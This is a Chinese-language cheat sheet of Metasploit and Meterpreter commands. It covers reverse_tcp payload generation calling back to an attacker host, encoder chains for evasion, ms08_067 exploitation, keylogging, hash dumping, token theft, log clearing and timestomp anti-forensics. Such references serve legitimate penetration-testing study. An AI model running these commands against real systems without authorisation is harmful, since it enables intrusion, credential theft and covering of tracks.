標籤:grep top 賬戶 str target clear cti man 輸出
show exploits
列出metasploit架構中的所有滲透攻擊模組。
show payloads
列出metasploit架構中的所有攻擊載荷。
show auxiliary
列出metasploit架構中的所有輔助攻擊載荷。
search name
尋找metasploit架構中所有的滲透攻擊和其他模組。
info
展示出制定滲透攻擊或模組的相關資訊。
use name
裝載一個滲透攻擊或模組。
LHOST
你本地可以讓目標主機串連的IP地址,通常當目標主機不在同一個區域網路內時,就需要是一個公用IP地址,特別為反彈式shell使用。
RHOST
遠程主機或是目標主機。
set function
設定特定的配置參數(EG:設定本地或遠程主機參數)。
setg function
以全域方式設定特定的配置參數(EG:設定本地或遠程主機參數)。
show options
列出某個滲透攻擊或模組中所有的配置參數。
show targets
列出滲透攻擊所有支援的目標平台。
set target num
指定你所知道的目標的作業系統以及補丁版本類型。
set payload name
指定想要使用的攻擊載荷。
show advanced
列出所有進階配置選項。
set autorunscript migrate -f.
在滲透攻擊完成後,將自動遷移到另一個進程。
check
檢測目標是否選定滲透攻擊存在相應的安全性漏洞。
exploit
執行滲透攻擊或模組來攻擊目標。
exploit -j
在計劃任務下進行滲透攻擊(攻擊將在後台進行)。
exploit -z
滲透攻擊完成後不與回話進行互動。
exploit -e encoder
制定使用的攻擊載荷編碼方式(EG:exploit -e shikata_ga_nai)。
exploit -h
列出exploit命令的協助資訊。
sessions -l
列出可用的互動會話(在處理多個shell時使用)。
sessions -l -v
列出所有可用的互動會話以及詳細資料,EG:攻擊系統時使用了哪個安全性漏洞。
sessions -s script
在所有活躍的metasploit會話中運行一個特定的metasploit指令碼。
sessions -K
殺死所有活躍的互動會話。
sessions -c cmd
在所有活躍的metasploit會話上執行一個命令。
sessions -u sessionID
升級一個普通的win32 shell到metasploit shell。
db_create name
建立一個資料庫驅動攻擊所要使用的資料庫(EG:db_create autopwn)。
db_connect name
建立並串連一個資料庫驅動攻擊所要使用的資料庫(EG:db_connect user:[email protected]/sqlname)。
db_namp
利用nmap並把掃描資料存放區到資料庫中(支援普通的nmap語句,EG:-sT -v -P0)。
db_autopwn -h
展示出db_autopwn命令的協助資訊。
db_autopwn -p -r -e
對所有發現的開放連接埠執行db_autopwn,攻擊所有系統,並使用一個反彈式shell。
db_destroy
刪除當前資料庫。
db_destroy user:[email protected]:port/database
使用進階選項來刪除資料庫。
***metasploit命令***
help
開啟meterpreter使用協助。
run scriptname
運行meterpreter指令碼,在scripts/meterpreter目錄下可查看到所有指令碼名。
sysinfo
列出受控主機的系統資訊。
ls
列出目標主機的檔案和檔案夾資訊。
use priv
載入權限提高擴充模組,來擴充metasploit庫。
ps
顯示所有啟動並執行進程以及相關聯的使用者賬戶。
migrate PID
遷移到一個指定的進程ID(PID號可通過ps命令從主機上獲得)。
use incognito
載入incognito功能(用來盜竊目標主機的令牌或假冒使用者)
list_tokens -u
列出目標主機使用者的可用令牌。
list_tokens -g
列出目標主機使用者組的可用令牌。
impersonate_token DOMAIN_NAME\USERNAME
假冒目標主機上的可用令牌。
steal_token PID
盜竊給定進程的可用令牌並進行令牌假冒。
drop_token
停止假冒當前令牌。
getsystem
通過各種攻擊向量來提升系統使用者權限。
execute -f cmd.exe -i
執行cmd.exe命令並進行互動。
execute -f cmd.exe -i -t
以所有可用令牌來執行cmd命令並隱藏該進程。
rev2self
回到控制目標主機的初始使用者賬戶下。
reg command
在目標主機註冊表中進行互動,建立,刪除,查詢等操作。
setdesktop number
切換到另一個使用者介面(該功能基於那些使用者已登入)。
screenshot
對目標主機的螢幕進行。
upload file
向目標主機上傳檔案。
download file
從目標主機下載檔案。
keyscan_start
針對遠程目標主機開啟鍵盤記錄功能。
keyscan_dump
儲存目標主機上捕獲的鍵盤記錄。
keyscan_stop
停止針對目標主機的鍵盤記錄。
getprivs
儘可能多的擷取目標主機上的特權。
uictl enable keyboard/mouse
接管目標主機的鍵盤和滑鼠。
background
將你當前的metasploit shell轉為後台執行。
hashdump
匯出目標主機中的口令雜湊值。
use sniffer
載入嗅探模式。
sniffer_interfaces
列出目標主機所有開放的網路連接埠。
sniffer_dump interfaceID pcapname
在目標主機上啟動嗅探。
sniffer_start interfaceID packet-buffer
在目標主機上針對特定範圍的資料包緩衝區啟動嗅探。
sniffer_stats interfaceID
擷取正在實施嗅探網路介面的統計資料。
sniffer_stop interfaceID
停止嗅探。
add_user username password -h ip
在遠程目標主機上添加一個使用者。
clearev
清楚目標主機上的日誌記錄。
timestomp
修改檔案屬性,例如修改檔案的建立時間(反取證調查)。
reboot
重啟目標主機。
***MSFpayload命令***
msfpayload -h
msfpayload的協助資訊。
msfpayload windows/meterpreter/bind_tcp O
列出所有windows/meterpreter/bind_tcp下可用的攻擊載荷的配置項(任何攻擊載荷都是可用配置的)。
msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT X > payload.exe
建立一個metasploit的reverse_tcp攻擊載荷,回連到LHOSTip的LPORT,將其儲存為名為payload.exe的windows下可執行程式。
msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT R > payload.raw
建立一個metasploit的reverse_tcp攻擊載荷,回連到LHOSTip的LPORT,將其儲存為名為payload.raw,該檔案後面的msffencode中使用。
msfpayload windows/meterpreter/reverse_tcp LPORT=PORT C > payload.c
建立一個metasploit的reverse_tcp攻擊載荷,匯出C格式的shellcode。
msfpayload windows/meterpreter/reverse_tcp LPORT=PORT J > payload.java
建立一個metasploit的reverse_tcp攻擊載荷,匯出成以%u編碼方式的javaScript語言字串。
***msfencode命令***
mefencode -h
列出msfencode的協助命令。
msfencode -l
列出所有可用的編碼器。
msfencode -t (c,elf,exe,java,is_le,js_be,perl,raw,ruby,vba,vbs,loop_vbs,asp,war,macho)
顯示編碼緩衝區的格式。
msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe
使用shikata_ga_nai編碼器對payload.raw檔案進行5編碼,然後匯出一個名為encoded_payload.exe的檔案。
msfpayload windows/meterpreter/bind_tcp LPORT=PORT R | msfencode -e x86/_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe
建立一個經過多種編碼格式嵌套編碼的攻擊載荷。
msfencode -i payload.raw BufferRegister=ESI -e x86/alpja_mixed -t c
建立一個純字母數位shellcode,由ESI寄存器只想shellcode,以C語言格式輸出。
***MSFcli命令***
msfcli | grep exploit
僅列出滲透攻擊模組。
msfcli | grep exploit/windows
僅列出與windows相關的滲透攻擊模組。
msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=PORT RHOST=IP E
對IP發起ms08_067_netapi滲透攻擊,配置了bind_tcp攻擊載荷,並綁定在PORT連接埠進行監聽。
metasploit(MSF)終端命令大全